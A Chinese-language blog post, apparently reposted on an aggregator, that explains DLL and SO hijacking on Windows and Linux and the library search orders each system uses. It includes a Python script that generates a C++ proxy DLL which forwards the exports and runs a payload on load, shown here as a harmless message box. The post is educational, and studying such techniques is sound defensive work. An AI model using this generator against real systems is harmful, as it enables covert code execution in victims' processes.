2. 程式人生 > 其它 >在Windows和Linux系統上的DLL劫持

在Windows和Linux系統上的DLL劫持

阿新 發佈:2022-02-20

一、概念

  DLL(Dynamic-link library)是Windows作業系統上實現的共享庫,又稱動態連結庫。DLL 的檔案格式與 EXE 檔案的檔案格式相同,即還是32位和64位Windows的可移植可執行檔案(PE檔案)。

  SO 是Linux作業系統上實現的共享庫,又稱動態連結庫。SO 的檔案格式是32位和64位Linux的可移植可執行檔案(ELF檔案)。

  動態連結庫的作用,為程式提供匯入函式以實現共享開發者程式碼,其在程序需要呼叫某個匯入函式時進行動態連結將整個庫檔案載入進記憶體中。

  那什麼是dll劫持?

  黑客通過將原本要載入的目標動態連結庫用自己惡意編寫的dll檔案去替換,就可以讓目標程序載入黑客的動態連結庫,從而執行動態連結庫中的惡意程式碼,達到攻擊的目的。

二、劫持動態連結庫的要求

  黑客編寫的惡意dll或so檔案需要滿足以下要求:

  1. 確保檔案中的程式碼可以正常執行,不會對目標程序造成異常錯誤
  2. 必須具有對於目標程序呼叫的函式,並且函式宣告和呼叫約定相同(但是具體函式內部程式碼可以不同,只要返回值可以讓目標程序正常接受就可)

PS:可以在庫中新增額外的函式。

三、Windows和Linux中的dll劫持區別

  Windows中的dll劫持

  當然我們也可以在不刪除目標dll檔案或方便操作的目的,根據程序尋找dll所在目錄的順序來放置我們的惡意dll檔案,只要我們的惡意dll檔案在目標dll檔案之前被程序找到,也可以達到劫持目的。

Windows中,程序尋找dll檔案所在目錄順序:

  1. 程序對應的應用程式所在目錄
  2. 系統目錄(一般為 System32 目錄,如果是在 64 位系統下的32位程式,則為 SysWOW64 目錄)
  3. 16位系統目錄
  4. Windows目錄
  5. PATH環境變數中的各個目錄

PS:在登錄檔HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\KnownDLLs不能在系統目錄以外被載入。

  Linux中的dll劫持

  同理。

Linux中,程序尋找so檔案所在目錄順序:

  1. 編譯目的碼時指定的動態庫搜尋路徑(編譯時-L、-rpath和-rpath-link指定的路徑)
  2. 環境變數LD_LIBRARY_PATH指定的動態庫搜尋路徑
  3. 配置檔案/etc/ld.so.conf中指定的動態庫搜尋路徑
  4. 預設的動態庫搜尋路徑/lib
  5. 預設的動態庫搜尋路徑/usr/lib

四、劫持實現

劫持的目的就是執行我們自己的dll或so檔案。

將劫持dll檔案放到原dll檔案所在目錄,而原dll則移到一個不會干擾的目錄即可。

關於劫持dll的生成,我們可以自己手動編寫,也可以通過使用工具輔助生成。

工具輔助思路:根據獲取的所有匯入函式生成一個.c或.cpp檔案,生成的轉發函式如下:

extern "C" __declspec(naked) void __cdecl 目標函式名(void)
{
    __asm POP dwReturnAddress;
    GetAddress("目標函式名")();
    __asm JMP dwReturnAddress;
}

再通過對編譯器設定函式轉發,實現函式轉發,如:

#pragma comment(linker, "/EXPORT:main=_DLLHijacker_main,@5")

貼上我自己參考https://github.com/zhaoed/DLL_Hijacker-1/修改後的指令碼:

import os,sys,time
import pefile

def main():
    pe = pefile.PE(sys.argv[1])
    exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols
    print("[!]Find export function :[ %d ]\r\n" % len(exportTable))
    for exptab in exportTable: 
        print("%3s %10s" % (exptab.ordinal, exptab.name))
    print("\r\n[+] generating DLL Hijack cpp file ...")
    generate(exportTable)
    print("\r\n[+] generating DLL Hijack cpp file has finished!")

def generate(exportTable):
    segments = r"//Generate by DLLHijacker.py\
\
#include <Windows.h>\
\
DEFINE_DLL_EXPORT_FUNC\
#define EXTERNC extern \"C\"\
#define NAKED __declspec(naked)\
#define EXPORT __declspec(dllexport)\
#define ALCPP EXPORT NAKED\
#define ALSTD EXTERNC EXPORT NAKED void __stdcall\
#define ALCDECL EXTERNC NAKED void __cdecl\
\
namespace DLLHijacker\
{\
    HMODULE m_hModule = NULL;\
    DWORD dwReturnAddress;\
    inline BOOL WINAPI Load()\
    {\
        TCHAR tzPath[MAX_PATH];\
        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));\
        m_hModule = LoadLibrary(tzPath);\
        if (m_hModule == NULL)\
            return FALSE;\
        return (m_hModule != NULL);\
    }\
    inline VOID WINAPI Free()\
    {\
        if (m_hModule)\
            FreeLibrary(m_hModule);\
    }\
    FARPROC WINAPI GetAddress(PCSTR pszProcName)\
    {\
        FARPROC fpAddress;\
        CHAR szProcName[16];\
        fpAddress = GetProcAddress(m_hModule, pszProcName);\
        if (fpAddress == NULL)\
        {\
            if (HIWORD(pszProcName) == 0)\
            {\
                wsprintf(szProcName, \"%d\", pszProcName);\
                pszProcName = szProcName;\
            }\
            ExitProcess(-2);\
        }\
        return fpAddress;\
    }\
}\
using namespace DLLHijacker;\
VOID Hijack()\
{\
    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);\
}\
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)\
{\
    if (dwReason == DLL_PROCESS_ATTACH)\
    {\
        DisableThreadLibraryCalls(hModule);\
        if(Load())\
            Hijack();\
    }\
    else if (dwReason == DLL_PROCESS_DETACH)\
    {\
        Free();\
    }\
    return TRUE;\
}\
"
    filename = sys.argv[1]
    fp = open(filename + ".cpp", "w+")
    define_dll_exp_func = ""
    for exptable in exportTable:
        define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name, encoding = "utf-8") +\
                            "=_DLLHijacker_" + str(exptable.name, encoding = "utf-8") + ",@"+ str(exptable.ordinal) +"\")\n"
    segments = segments.replace('DLL_FILENAME', filename)
    segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\\','')
    fp.writelines(segments)
    
    forward_dll_exp_func = ""
    for exptable in exportTable:
        forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name, encoding = "utf-8") +"(void)\n{" + \
                            "\n        __asm POP dwReturnAddress;\n    GetAddress(\""+ \
                            str(exptable.name, encoding = "utf-8") + "\")();\n    __asm JMP dwReturnAddress;\n}\r\n"
    fp.writelines(forward_dll_exp_func)
    fp.close()

def usage():
    print("Usage:")
    print("    %s 目標.dll" % sys.argv[0])

if __name__ == "__main__":
    if(len(sys.argv) <2):
        usage()
    else:
        main()

相關推薦

WindowsLinux系統DLL劫持

一、概念   DLL(Dynamic-link library)是Windows作業系統實現的共享庫,又稱動態連結庫。DLL 的檔案格式與 EXE 檔案的檔案格式相同,即還是32位64位Windows的可移植可執行檔案(PE檔案)。

3、在Windowslinux系統使用python

技術標籤:網路工程師pythonpythonlinuxwindows Windows系統 互動模式 指令碼模式 互動模式 1、 使用命令列進入 Python 直譯器 2、使用 IDLE 進入 Python 直譯器 指令碼模式 1、使用記事本建立python指令碼 (1

WindowsLinux系統對比,哪個先進?

作業系統是我們日常辦公都不能缺少的,同時作業系統還分為了LinuxWindows系統,那麼這兩種系統哪個更加先進呢?

關於mongodb 在windows linux CentOs7.x系統的安裝步驟詳解

技術標籤:node.js後端mongodb 一、mongodb的簡介 MongoDB 是一個基於分散式檔案儲存的資料庫。由 C++ 語言編寫。旨在為 WEB 應用提供可擴充套件的高效能資料儲存解決方案。MongoDB 是一個介於關係資料庫非關係

Windows Linux Redis的安裝守護程序配置方法

# Windows Linux Redis的安裝守護程序配置 Redis 簡介 ​ Redis是目前最常用的非關係型資料庫(NOSql)之一,常以Key-Value的形式儲存。Redis讀寫速度遠遠比關係型資料庫高(mysql、oracle)。所以常用作專案熱

使用FTP軟體filezilla實現在Windows系統Linux系統之間互傳檔案

一、 下載安裝FTP軟體filezilla 連結:filezilla百度雲資源 提取碼:2677 雙擊開啟下載好的FTP軟體filezilla

Linux系統資料庫管理開發工具DBeaver使用安裝介紹

Windows,有很多的MySQL客戶端,但是在的好用的、相容性好的可不多。官方的mysql-bench是一個不錯的選擇,但是依賴太多了。我使用Manjaro就是因為它的簡介,不喜歡安裝太多的東西。

WinSCP+PuTTY搭配使用 ,解決Windows連線Linux系統檔案傳輸終端登陸

一 、為什麼要聯合使用winscp+putty WinSCP是一個Windows環境下使用SSH的開源圖形化SFTP客戶端。同時支援SCP協議。它的主要功能就是在本地與遠端計算機間安全的複製檔案。winscp也可以連結其他系統,比如linux系統

Windows Linux檔案系統格式

Windows Linux檔案系統格式 Windows Linux檔案系統格式 寫在前面的話 不同作業系統 需要使用 不同型別的檔案系統, 為了與其他作業系統相容, 以相互交換資料, 通常作業系統都能支援 多種型別的 檔案系統

一次緊急的系統修復,卡在了Linux,用了windows linux 互傳檔案命令 scp 後解決問題

十年河東,十年河西,莫欺少年窮 學無止境,精益求精 今天已過半,這個半天是慘痛的半天,在地鐵的我,連續接了好幾個電話,有語音電話,視訊電話,還有純的打電話,電話內容:公司各個小程式全掛了,無論哪個頁面

Linux系統配置微軟Windows遠端桌面服務

1、 https://www.toutiao.com/article/6928547969507557891/?app=news_article&timestamp=1654071280&use_new_style=1&req_id=202206011614390101511802281C04F834&group_id=6928547969507557891&am

無頭模式,WindowsLinux

----windows from selenium import webdriver from selenium .webdriver.common.by import By import ttime chrome_options =webdriver.ChromeOptions()

windowslinux修改ipv6ipv4的優先順序

如果一臺機器系統配置ipv6地址ipv4地址共存,訪問兩種網站都可以 但有個很尷尬的問題,因為作業系統預設是V6優先於V4,所以比如一個地址同時有AAAAA記錄的話,那麼系統會自動選擇V6協議通訊。

檢視windowslinux下埠是否被佔用

1、windows cmd輸入netstat -ano |findstr \"埠號\" 檢視到1202埠被使用的程序PID是10692 輸入tasklist |findstr 10692檢視是哪個服務佔用了這個程序

獲取windowslinux獲取本機ip

InetAddress.getLocalHost().getHostAddress() 獲取本機ip在linux上報錯: Caused by: java.net.UnknownHostException

node.js/npm升級正確操作(windowslinux均有)

原文地址:https://www.wjcms.net/archives/nodejsnpm升級正確操作windowslinux均有 今天我們總結一下node.js以及npm升級的正確操作方法。

選擇困難症必看!雲伺服器如何選擇作業系統,WindowsLinux哪個更好?

在購買雲伺服器時,會有一個必選的配置,就是作業系統的選擇,如何選擇作業系統?作業系統選擇錯了怎麼辦?這是不少使用者會遇到的問題,今天我們就來教大家如何選擇作業系統,以及作業系統選擇錯了,該怎麼切換。

如何在WindowsLinux系統中安裝Redis

一:Windos下安裝Redis並設定自動啟動 1、下載windows版本的Redis 去官網找了很久,發現原來在官網上可以下載的windows版本的,現在官網已經沒有windows版本的下載地址,只能在github下載,官網只提供linux版本的下

shell指令碼監測Linux系統Tomcat專案執行是否正常,否則重新啟動專案

之前在網上查的指令碼執行總是無法正常監測,後面改了一些東西后才正常,現在記錄希望對大家有所幫助。

Linux系統檔案的特殊許可權及檔案acl

Linux系統檔案的特殊許可權及檔案acl新建歡迎來到 來到大浪濤天的部落格 !